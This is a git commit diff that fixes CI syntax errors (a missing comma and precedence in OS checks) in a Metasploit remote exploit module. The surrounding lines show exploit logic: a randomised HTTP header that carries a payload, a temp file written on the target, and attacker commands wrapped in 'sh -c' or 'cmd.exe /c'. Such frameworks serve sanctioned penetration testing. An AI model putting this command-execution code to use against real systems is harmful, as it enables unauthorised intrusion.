Address travis errors: Updated metadata and target OS logic
parent
cb16f812ec
commit
7eb06b4592
|
@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
)
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])
|
||||
OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),
|
||||
OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', "X-#{rand_text_alpha(4)}"] ),
|
||||
OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', "#{rand_text_alpha(8)}"] ),
|
||||
]
|
||||
|
@ -253,7 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
properties = profile_target
|
||||
|
||||
os = properties[:'os.name'].downcase
|
||||
if os.include? 'linux' || os.include? 'nix'
|
||||
if (os.include? 'linux') || (os.include? 'nix')
|
||||
cmd = "{'sh','-c','#{cmd_input}'}"
|
||||
elsif os.include? 'win'
|
||||
cmd = "{'cmd.exe','/c','#{cmd_input}'}"
|
||||
|
@ -293,7 +293,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
if os.include? 'win'
|
||||
fail_with(Failure::NoTarget, "Windows currently unsupported.")
|
||||
#execute_cmdstager(flavor: :vbs)
|
||||
elsif os.include? 'linux' || os.include? 'nix'
|
||||
elsif (os.include? 'linux') || (os.include? 'nix')
|
||||
# cool. Keep going
|
||||
else
|
||||
print_error("Unrecognized operating system.")
|
||||
|
|
Loading…
Reference in New Issue